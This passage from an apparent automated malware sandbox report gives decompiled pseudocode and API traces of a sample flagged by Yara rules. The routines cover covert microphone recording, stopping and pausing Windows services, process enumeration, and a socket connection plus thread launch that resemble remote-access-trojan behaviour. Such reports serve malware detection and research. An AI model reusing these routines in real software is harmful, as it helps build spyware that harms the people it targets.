                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                        • String ID:
                                        • API String ID: 573486607-0
                                        • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                        • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DBD7, Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			E0040DBD7() {
				char* _t7;
				int _t8;
				char* _t9;
				int _t10;
				char* _t11;
				void* _t33;
				void* _t40;

				 *0x41b1f8 = 0;
				_t7 = E0040180C(_t33 - 0x10, 0, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t8 = atoi(_t7);
				_t9 = E0040180C(_t33 - 0x10, 0, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t10 = atoi(_t9);
				_t11 = E0040180C(_t33 - 0x10, 0, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004010CE(_t40, atoi(_t11), _t10, _t8);
				E004017DD(_t33 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}










                                        0x0040dbde
                                        0x0040dbe4
                                        0x0040dbeb
                                        0x0040dbf8
                                        0x0040dc01
                                        0x0040dc08
                                        0x0040dc0f
                                        0x0040dc17
                                        0x0040dc1e
                                        0x0040dc29
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                        • atoi.MSVCRT ref: 0040DBF8
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                        • atoi.MSVCRT ref: 0040DC0F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                        • atoi.MSVCRT ref: 0040DC25
                                          • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                          • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                          • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                        • String ID:
                                        • API String ID: 463581448-0
                                        • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                        • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                        • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                        • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                        0x00411862
                                        0x00411868
                                        0x00411873
                                        0x00411875
                                        0x00411883
                                        0x00411887
                                        0x004118a8
                                        0x004118ab
                                        0x004118ae
                                        0x00411889
                                        0x0041188a
                                        0x0041188a
                                        0x004118b3
                                        0x004118bf

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                        • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004118C0, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                        0x004118c9
                                        0x004118cf
                                        0x004118da
                                        0x004118dc
                                        0x004118ea
                                        0x004118ee
                                        0x0041190f
                                        0x00411912
                                        0x00411915
                                        0x004118f0
                                        0x004118f1
                                        0x004118f1
                                        0x0041191a
                                        0x00411926

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                        • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411760, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00411760(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x20);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                        0x00411769
                                        0x0041176f
                                        0x0041177a
                                        0x0041177c
                                        0x0041178a
                                        0x0041178e
                                        0x004117af
                                        0x004117b2
                                        0x004117b5
                                        0x00411790
                                        0x00411791
                                        0x00411791
                                        0x004117ba
                                        0x004117c6

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                        • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                        • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                        • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D761, Relevance: 12.0, APIs: 8, Instructions: 44COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E0040D761(void* __ecx, void* __eflags) {
				void* _t15;
				void* _t20;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t38;

				_t38 = __eflags;
				_t20 = __ecx;
				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
				_t15 = _t32 - 0x60;
				L00414140();
				L00414170();
				E004020C2(0x41be70, 0x4f, _t34);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E004017DD(_t32 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}









                                        0x0040d761
                                        0x0040d761
                                        0x0040d76e
                                        0x0040d78a
                                        0x0040d78e
                                        0x0040d798
                                        0x0040d7a7
                                        0x0040d7af
                                        0x0040e69b
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                        • _itoa.MSVCRT ref: 0040D76E
                                          • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                          • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                          • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                          • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                        • String ID:
                                        • API String ID: 1707565870-0
                                        • Opcode ID: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                        • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                        • Opcode Fuzzy Hash: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                        • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041230A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90sleeplibraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr* _t59;

				_t56 = __edx;
				_t54 = __ecx;
				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t59( &_v44,  &_v60,  &_v76);
				Sleep(0x3e8);
				 *_t59( &_v52,  &_v68,  &_v84);
				_v28 = E004123EE(_t54,  &_v44);
				_v24 = _t56;
				_v20 = E004123EE(_t54,  &_v52);
				_v16 = _t56;
				_t39 = E004123EE(_t54,  &_v60);
				_v32 = _t56;
				_t41 = E004123EE(_t54,  &_v68);
				_v12 = E004123EE(_t54,  &_v76);
				asm("sbb edi, [ebp-0x1c]");
				_v8 = _t56;
				_v32 = _t56;
				_t45 = E004123EE(_t54,  &_v84);
				asm("sbb edi, [ebp-0x4]");
				asm("sbb ecx, [ebp-0xc]");
				asm("adc ecx, [ebp-0x1c]");
				asm("adc ecx, [ebp-0x14]");
				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
				asm("adc edi, [ebp-0x1c]");
				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
			}























                                        0x0041230a
                                        0x0041230a
                                        0x0041232a
                                        0x00412338
                                        0x0041233f
                                        0x00412351
                                        0x0041235c
                                        0x00412363
                                        0x0041236b
                                        0x00412372
                                        0x00412375
                                        0x00412380
                                        0x00412383
                                        0x00412397
                                        0x0041239a
                                        0x004123a1
                                        0x004123a6
                                        0x004123a9
                                        0x004123bc
                                        0x004123c6
                                        0x004123cb
                                        0x004123d1
                                        0x004123d6
                                        0x004123dd
                                        0x004123ed

                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                        • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                        • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                        • __aulldiv.LIBCMT ref: 004123E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProcSleep__aulldiv
                                        • String ID: GetSystemTimes$kernel32.dll
                                        • API String ID: 482274533-1354958348
                                        • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                        • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                        • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                        • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410E53, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                        0x00410e65
                                        0x00410e72
                                        0x00410e83
                                        0x00410e84
                                        0x00410e85
                                        0x00410e86
                                        0x00410e87
                                        0x00410e9a
                                        0x00410eac
                                        0x00410eb0
                                        0x00410eba
                                        0x00410ec6
                                        0x00410ed0
                                        0x00410ed9
                                        0x00410ee2
                                        0x00410eef
                                        0x00410ef7
                                        0x00410f03

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                          • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                        • String ID:
                                        • API String ID: 2339118965-0
                                        • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                        • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
